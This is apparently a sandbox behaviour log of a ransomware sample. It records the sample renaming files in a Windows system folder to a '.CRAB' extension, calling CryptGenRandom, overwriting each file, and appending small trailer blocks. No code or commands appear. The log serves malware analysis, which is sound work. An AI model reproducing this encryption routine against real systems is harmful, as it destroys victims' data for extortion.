File Read filename = C:\System Volume Information\SPP\OnlineMetadataCache\{1e9425cc-553b-418f-b0c6-ad1ac9e1ba0c}_OnDiskSnapshotProp.CRAB, size = 1048576, size_out = 3440 True 1
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{1e9425cc-553b-418f-b0c6-ad1ac9e1ba0c}_OnDiskSnapshotProp.CRAB, size = 3440 True 1
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{1e9425cc-553b-418f-b0c6-ad1ac9e1ba0c}_OnDiskSnapshotProp.CRAB, size = 256 True 2
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{1e9425cc-553b-418f-b0c6-ad1ac9e1ba0c}_OnDiskSnapshotProp.CRAB, size = 8 True 1
Fn
File Get Info filename = C:\System Volume Information\SPP\OnlineMetadataCache\{29088c66-de5f-456f-85c0-6e4156f94358}_OnDiskSnapshotProp, type = file_attributes True 1
Fn
File Move source_filename = C:\System Volume Information\SPP\OnlineMetadataCache\{29088c66-de5f-456f-85c0-6e4156f94358}_OnDiskSnapshotProp, destination_filename = C:\System Volume Information\SPP\OnlineMetadataCache\{29088c66-de5f-456f-85c0-6e4156f94358}_OnDiskSnapshotProp.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
File Create filename = C:\System Volume Information\SPP\OnlineMetadataCache\{29088c66-de5f-456f-85c0-6e4156f94358}_OnDiskSnapshotProp.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\System Volume Information\SPP\OnlineMetadataCache\{29088c66-de5f-456f-85c0-6e4156f94358}_OnDiskSnapshotProp.CRAB, size = 1048576, size_out = 3296 True 1
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{29088c66-de5f-456f-85c0-6e4156f94358}_OnDiskSnapshotProp.CRAB, size = 3296 True 1
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{29088c66-de5f-456f-85c0-6e4156f94358}_OnDiskSnapshotProp.CRAB, size = 256 True 2
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{29088c66-de5f-456f-85c0-6e4156f94358}_OnDiskSnapshotProp.CRAB, size = 8 True 1
Fn
File Get Info filename = C:\System Volume Information\SPP\OnlineMetadataCache\{29296136-1f54-4fd8-b5c7-32fc96ef3c76}_OnDiskSnapshotProp, type = file_attributes True 1
Fn
File Move source_filename = C:\System Volume Information\SPP\OnlineMetadataCache\{29296136-1f54-4fd8-b5c7-32fc96ef3c76}_OnDiskSnapshotProp, destination_filename = C:\System Volume Information\SPP\OnlineMetadataCache\{29296136-1f54-4fd8-b5c7-32fc96ef3c76}_OnDiskSnapshotProp.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
File Create filename = C:\System Volume Information\SPP\OnlineMetadataCache\{29296136-1f54-4fd8-b5c7-32fc96ef3c76}_OnDiskSnapshotProp.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\System Volume Information\SPP\OnlineMetadataCache\{29296136-1f54-4fd8-b5c7-32fc96ef3c76}_OnDiskSnapshotProp.CRAB, size = 1048576, size_out = 3632 True 1
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{29296136-1f54-4fd8-b5c7-32fc96ef3c76}_OnDiskSnapshotProp.CRAB, size = 3632 True 1
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{29296136-1f54-4fd8-b5c7-32fc96ef3c76}_OnDiskSnapshotProp.CRAB, size = 256 True 2
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{29296136-1f54-4fd8-b5c7-32fc96ef3c76}_OnDiskSnapshotProp.CRAB, size = 8 True 1
Fn
File Get Info filename = C:\System Volume Information\SPP\OnlineMetadataCache\{4204ee1b-0338-4788-b199-d83e4955faf1}_OnDiskSnapshotProp, type = file_attributes True 1
Fn
File Move source_filename = C:\System Volume Information\SPP\OnlineMetadataCache\{4204ee1b-0338-4788-b199-d83e4955faf1}_OnDiskSnapshotProp, destination_filename = C:\System Volume Information\SPP\OnlineMetadataCache\{4204ee1b-0338-4788-b199-d83e4955faf1}_OnDiskSnapshotProp.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
File Create filename = C:\System Volume Information\SPP\OnlineMetadataCache\{4204ee1b-0338-4788-b199-d83e4955faf1}_OnDiskSnapshotProp.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\System Volume Information\SPP\OnlineMetadataCache\{4204ee1b-0338-4788-b199-d83e4955faf1}_OnDiskSnapshotProp.CRAB, size = 1048576, size_out = 3184 True 1
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{4204ee1b-0338-4788-b199-d83e4955faf1}_OnDiskSnapshotProp.CRAB, size = 3184 True 1
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{4204ee1b-0338-4788-b199-d83e4955faf1}_OnDiskSnapshotProp.CRAB, size = 256 True 2
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{4204ee1b-0338-4788-b199-d83e4955faf1}_OnDiskSnapshotProp.CRAB, size = 8 True 1
Fn
File Get Info filename = C:\System Volume Information\SPP\OnlineMetadataCache\{425865b3-1a09-4be3-8a97-1baffda74ed0}_OnDiskSnapshotProp, type = file_attributes True 1
Fn
File Move source_filename = C:\System Volume Information\SPP\OnlineMetadataCache\{425865b3-1a09-4be3-8a97-1baffda74ed0}_OnDiskSnapshotProp, destination_filename = C:\System Volume Information\SPP\OnlineMetadataCache\{425865b3-1a09-4be3-8a97-1baffda74ed0}_OnDiskSnapshotProp.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
File Create filename = C:\System Volume Information\SPP\OnlineMetadataCache\{425865b3-1a09-4be3-8a97-1baffda74ed0}_OnDiskSnapshotProp.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\System Volume Information\SPP\OnlineMetadataCache\{425865b3-1a09-4be3-8a97-1baffda74ed0}_OnDiskSnapshotProp.CRAB, size = 1048576, size_out = 2944 True 1
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{425865b3-1a09-4be3-8a97-1baffda74ed0}_OnDiskSnapshotProp.CRAB, size = 2944 True 1
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{425865b3-1a09-4be3-8a97-1baffda74ed0}_OnDiskSnapshotProp.CRAB, size = 256 True 2
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{425865b3-1a09-4be3-8a97-1baffda74ed0}_OnDiskSnapshotProp.CRAB, size = 8 True 1
Fn
File Get Info filename = C:\System Volume Information\SPP\OnlineMetadataCache\{51296d62-5aa5-412e-9a8f-abe77cd15e9e}_OnDiskSnapshotProp, type = file_attributes True 1
Fn
File Move source_filename = C:\System Volume Information\SPP\OnlineMetadataCache\{51296d62-5aa5-412e-9a8f-abe77cd15e9e}_OnDiskSnapshotProp, destination_filename = C:\System Volume Information\SPP\OnlineMetadataCache\{51296d62-5aa5-412e-9a8f-abe77cd15e9e}_OnDiskSnapshotProp.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
File Create filename = C:\System Volume Information\SPP\OnlineMetadataCache\{51296d62-5aa5-412e-9a8f-abe77cd15e9e}_OnDiskSnapshotProp.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\System Volume Information\SPP\OnlineMetadataCache\{51296d62-5aa5-412e-9a8f-abe77cd15e9e}_OnDiskSnapshotProp.CRAB, size = 1048576, size_out = 840 True 1
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{51296d62-5aa5-412e-9a8f-abe77cd15e9e}_OnDiskSnapshotProp.CRAB, size = 848 True 1
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{51296d62-5aa5-412e-9a8f-abe77cd15e9e}_OnDiskSnapshotProp.CRAB, size = 256 True 2
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{51296d62-5aa5-412e-9a8f-abe77cd15e9e}_OnDiskSnapshotProp.CRAB, size = 8 True 1
Fn
File Get Info filename = C:\System Volume Information\SPP\OnlineMetadataCache\{5ac56584-2304-47b9-b262-8d3164a52d9e}_OnDiskSnapshotProp, type = file_attributes True 1
Fn
File Move source_filename = C:\System Volume Information\SPP\OnlineMetadataCache\{5ac56584-2304-47b9-b262-8d3164a52d9e}_OnDiskSnapshotProp, destination_filename = C:\System Volume Information\SPP\OnlineMetadataCache\{5ac56584-2304-47b9-b262-8d3164a52d9e}_OnDiskSnapshotProp.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
File Create filename = C:\System Volume Information\SPP\OnlineMetadataCache\{5ac56584-2304-47b9-b262-8d3164a52d9e}_OnDiskSnapshotProp.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\System Volume Information\SPP\OnlineMetadataCache\{5ac56584-2304-47b9-b262-8d3164a52d9e}_OnDiskSnapshotProp.CRAB, size = 1048576, size_out = 2616 True 1
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{5ac56584-2304-47b9-b262-8d3164a52d9e}_OnDiskSnapshotProp.CRAB, size = 2624 True 1
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{5ac56584-2304-47b9-b262-8d3164a52d9e}_OnDiskSnapshotProp.CRAB, size = 256 True 2
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{5ac56584-2304-47b9-b262-8d3164a52d9e}_OnDiskSnapshotProp.CRAB, size = 8 True 1
Fn
File Get Info filename = C:\System Volume Information\SPP\OnlineMetadataCache\{77ac2c2c-d323-4d07-bbbc-9f6908de6f91}_OnDiskSnapshotProp, type = file_attributes True 1
Fn
File Move source_filename = C:\System Volume Information\SPP\OnlineMetadataCache\{77ac2c2c-d323-4d07-bbbc-9f6908de6f91}_OnDiskSnapshotProp, destination_filename = C:\System Volume Information\SPP\OnlineMetadataCache\{77ac2c2c-d323-4d07-bbbc-9f6908de6f91}_OnDiskSnapshotProp.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
File Create filename = C:\System Volume Information\SPP\OnlineMetadataCache\{77ac2c2c-d323-4d07-bbbc-9f6908de6f91}_OnDiskSnapshotProp.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\System Volume Information\SPP\OnlineMetadataCache\{77ac2c2c-d323-4d07-bbbc-9f6908de6f91}_OnDiskSnapshotProp.CRAB, size = 1048576, size_out = 3440 True 1
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{77ac2c2c-d323-4d07-bbbc-9f6908de6f91}_OnDiskSnapshotProp.CRAB, size = 3440 True 1
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{77ac2c2c-d323-4d07-bbbc-9f6908de6f91}_OnDiskSnapshotProp.CRAB, size = 256 True 2
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{77ac2c2c-d323-4d07-bbbc-9f6908de6f91}_OnDiskSnapshotProp.CRAB, size = 8 True 1
Fn
File Get Info filename = C:\System Volume Information\SPP\OnlineMetadataCache\{7a521dbe-9658-44e5-843c-29dd5c50d136}_OnDiskSnapshotProp, type = file_attributes True 1
Fn
File Move source_filename = C:\System Volume Information\SPP\OnlineMetadataCache\{7a521dbe-9658-44e5-843c-29dd5c50d136}_OnDiskSnapshotProp, destination_filename = C:\System Volume Information\SPP\OnlineMetadataCache\{7a521dbe-9658-44e5-843c-29dd5c50d136}_OnDiskSnapshotProp.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
File Create filename = C:\System Volume Information\SPP\OnlineMetadataCache\{7a521dbe-9658-44e5-843c-29dd5c50d136}_OnDiskSnapshotProp.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\System Volume Information\SPP\OnlineMetadataCache\{7a521dbe-9658-44e5-843c-29dd5c50d136}_OnDiskSnapshotProp.CRAB, size = 1048576, size_out = 3416 True 1
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{7a521dbe-9658-44e5-843c-29dd5c50d136}_OnDiskSnapshotProp.CRAB, size = 3424 True 1
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{7a521dbe-9658-44e5-843c-29dd5c50d136}_OnDiskSnapshotProp.CRAB, size = 256 True 2
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{7a521dbe-9658-44e5-843c-29dd5c50d136}_OnDiskSnapshotProp.CRAB, size = 8 True 1
Fn
File Get Info filename = C:\System Volume Information\SPP\OnlineMetadataCache\{8000ffcd-1da9-461e-a8a6-b9c248869570}_OnDiskSnapshotProp, type = file_attributes True 1
Fn
File Move source_filename = C:\System Volume Information\SPP\OnlineMetadataCache\{8000ffcd-1da9-461e-a8a6-b9c248869570}_OnDiskSnapshotProp, destination_filename = C:\System Volume Information\SPP\OnlineMetadataCache\{8000ffcd-1da9-461e-a8a6-b9c248869570}_OnDiskSnapshotProp.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
File Create filename = C:\System Volume Information\SPP\OnlineMetadataCache\{8000ffcd-1da9-461e-a8a6-b9c248869570}_OnDiskSnapshotProp.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\System Volume Information\SPP\OnlineMetadataCache\{8000ffcd-1da9-461e-a8a6-b9c248869570}_OnDiskSnapshotProp.CRAB, size = 1048576, size_out = 2784 True 1
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{8000ffcd-1da9-461e-a8a6-b9c248869570}_OnDiskSnapshotProp.CRAB, size = 2784 True 1
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{8000ffcd-1da9-461e-a8a6-b9c248869570}_OnDiskSnapshotProp.CRAB, size = 256 True 2
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{8000ffcd-1da9-461e-a8a6-b9c248869570}_OnDiskSnapshotProp.CRAB, size = 8 True 1
Fn
File Get Info filename = C:\System Volume Information\SPP\OnlineMetadataCache\{8002c55b-b05c-402e-b80d-41cead61f984}_OnDiskSnapshotProp, type = file_attributes True 1
Fn
File Move source_filename = C:\System Volume Information\SPP\OnlineMetadataCache\{8002c55b-b05c-402e-b80d-41cead61f984}_OnDiskSnapshotProp, destination_filename = C:\System Volume Information\SPP\OnlineMetadataCache\{8002c55b-b05c-402e-b80d-41cead61f984}_OnDiskSnapshotProp.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
File Create filename = C:\System Volume Information\SPP\OnlineMetadataCache\{8002c55b-b05c-402e-b80d-41cead61f984}_OnDiskSnapshotProp.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\System Volume Information\SPP\OnlineMetadataCache\{8002c55b-b05c-402e-b80d-41cead61f984}_OnDiskSnapshotProp.CRAB, size = 1048576, size_out = 3360 True 1
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{8002c55b-b05c-402e-b80d-41cead61f984}_OnDiskSnapshotProp.CRAB, size = 3360 True 1
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{8002c55b-b05c-402e-b80d-41cead61f984}_OnDiskSnapshotProp.CRAB, size = 256 True 2
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{8002c55b-b05c-402e-b80d-41cead61f984}_OnDiskSnapshotProp.CRAB, size = 8 True 1
Fn
File Get Info filename = C:\System Volume Information\SPP\OnlineMetadataCache\{9069688d-befb-4294-b8a6-15447e1f812d}_OnDiskSnapshotProp, type = file_attributes True 1
Fn
File Move source_filename = C:\System Volume Information\SPP\OnlineMetadataCache\{9069688d-befb-4294-b8a6-15447e1f812d}_OnDiskSnapshotProp, destination_filename = C:\System Volume Information\SPP\OnlineMetadataCache\{9069688d-befb-4294-b8a6-15447e1f812d}_OnDiskSnapshotProp.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
File Create filename = C:\System Volume Information\SPP\OnlineMetadataCache\{9069688d-befb-4294-b8a6-15447e1f812d}_OnDiskSnapshotProp.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\System Volume Information\SPP\OnlineMetadataCache\{9069688d-befb-4294-b8a6-15447e1f812d}_OnDiskSnapshotProp.CRAB, size = 1048576, size_out = 944 True 1
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{9069688d-befb-4294-b8a6-15447e1f812d}_OnDiskSnapshotProp.CRAB, size = 944 True 1
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{9069688d-befb-4294-b8a6-15447e1f812d}_OnDiskSnapshotProp.CRAB, size = 256 True 2
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{9069688d-befb-4294-b8a6-15447e1f812d}_OnDiskSnapshotProp.CRAB, size = 8 True 1
Fn
File Get Info filename = C:\System Volume Information\SPP\OnlineMetadataCache\{a8f69a00-bbec-42a5-a3ef-bf81814bd449}_OnDiskSnapshotProp, type = file_attributes True 1
Fn
File Move source_filename = C:\System Volume Information\SPP\OnlineMetadataCache\{a8f69a00-bbec-42a5-a3ef-bf81814bd449}_OnDiskSnapshotProp, destination_filename = C:\System Volume Information\SPP\OnlineMetadataCache\{a8f69a00-bbec-42a5-a3ef-bf81814bd449}_OnDiskSnapshotProp.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
File Create filename = C:\System Volume Information\SPP\OnlineMetadataCache\{a8f69a00-bbec-42a5-a3ef-bf81814bd449}_OnDiskSnapshotProp.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\System Volume Information\SPP\OnlineMetadataCache\{a8f69a00-bbec-42a5-a3ef-bf81814bd449}_OnDiskSnapshotProp.CRAB, size = 1048576, size_out = 3408 True 1
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{a8f69a00-bbec-42a5-a3ef-bf81814bd449}_OnDiskSnapshotProp.CRAB, size = 3408 True 1
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{a8f69a00-bbec-42a5-a3ef-bf81814bd449}_OnDiskSnapshotProp.CRAB, size = 256 True 2
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{a8f69a00-bbec-42a5-a3ef-bf81814bd449}_OnDiskSnapshotProp.CRAB, size = 8 True 1
Fn
File Get Info filename = C:\System Volume Information\SPP\OnlineMetadataCache\{b46f41ee-ab11-4c6a-890b-df55c28a4b11}_OnDiskSnapshotProp, type = file_attributes True 1
Fn
File Move source_filename = C:\System Volume Information\SPP\OnlineMetadataCache\{b46f41ee-ab11-4c6a-890b-df55c28a4b11}_OnDiskSnapshotProp, destination_filename = C:\System Volume Information\SPP\OnlineMetadataCache\{b46f41ee-ab11-4c6a-890b-df55c28a4b11}_OnDiskSnapshotProp.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
File Create filename = C:\System Volume Information\SPP\OnlineMetadataCache\{b46f41ee-ab11-4c6a-890b-df55c28a4b11}_OnDiskSnapshotProp.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\System Volume Information\SPP\OnlineMetadataCache\{b46f41ee-ab11-4c6a-890b-df55c28a4b11}_OnDiskSnapshotProp.CRAB, size = 1048576, size_out = 3112 True 1
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{b46f41ee-ab11-4c6a-890b-df55c28a4b11}_OnDiskSnapshotProp.CRAB, size = 3120 True 1
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{b46f41ee-ab11-4c6a-890b-df55c28a4b11}_OnDiskSnapshotProp.CRAB, size = 256 True 2
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{b46f41ee-ab11-4c6a-890b-df55c28a4b11}_OnDiskSnapshotProp.CRAB, size = 8 True 1
Fn
File Get Info filename = C:\System Volume Information\SPP\OnlineMetadataCache\{bbee4aba-5da4-47f0-bd54-17c95dfb7e64}_OnDiskSnapshotProp, type = file_attributes True 1
Fn
File Move source_filename = C:\System Volume Information\SPP\OnlineMetadataCache\{bbee4aba-5da4-47f0-bd54-17c95dfb7e64}_OnDiskSnapshotProp, destination_filename = C:\System Volume Information\SPP\OnlineMetadataCache\{bbee4aba-5da4-47f0-bd54-17c95dfb7e64}_OnDiskSnapshotProp.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
File Create filename = C:\System Volume Information\SPP\OnlineMetadataCache\{bbee4aba-5da4-47f0-bd54-17c95dfb7e64}_OnDiskSnapshotProp.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\System Volume Information\SPP\OnlineMetadataCache\{bbee4aba-5da4-47f0-bd54-17c95dfb7e64}_OnDiskSnapshotProp.CRAB, size = 1048576, size_out = 3512 True 1
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{bbee4aba-5da4-47f0-bd54-17c95dfb7e64}_OnDiskSnapshotProp.CRAB, size = 3520 True 1
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{bbee4aba-5da4-47f0-bd54-17c95dfb7e64}_OnDiskSnapshotProp.CRAB, size = 256 True 2
Fn
File Write filename = C:\System Volume Information\SPP\OnlineMetadataCache\{bbee4aba-5da4-47f0-bd54-17c95dfb7e64}_OnDiskSnapshotProp.CRAB, size = 8 True 1
Fn
File Get Info filename = C:\System Volume Information\SPP\OnlineMetadataCache\{c3f59859-dd84-4710-b6be-740f016ad023}_OnDiskSnapshotProp, type = file_attributes True 1
Fn
File Move source_filename = C:\System Volume Information\SPP\OnlineMetadataCache\{c3f59859-dd84-4710-b6be-740f016ad023}_OnDiskSnapshotProp, destination_filename = C:\System Volume Information\SPP\OnlineMetadataCache\{c3f59859-dd84-4710-b6be-740f016ad023}_OnDiskSnapshotProp.CRAB True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x760e0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x760edfc8 True 1
Fn
File Create filename = C:\System Volume Information\SPP\OnlineMetadataCache\{c3f59859-dd84-4710-b6be-740f016ad023}_OnDiskSnapshotProp.CRAB, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
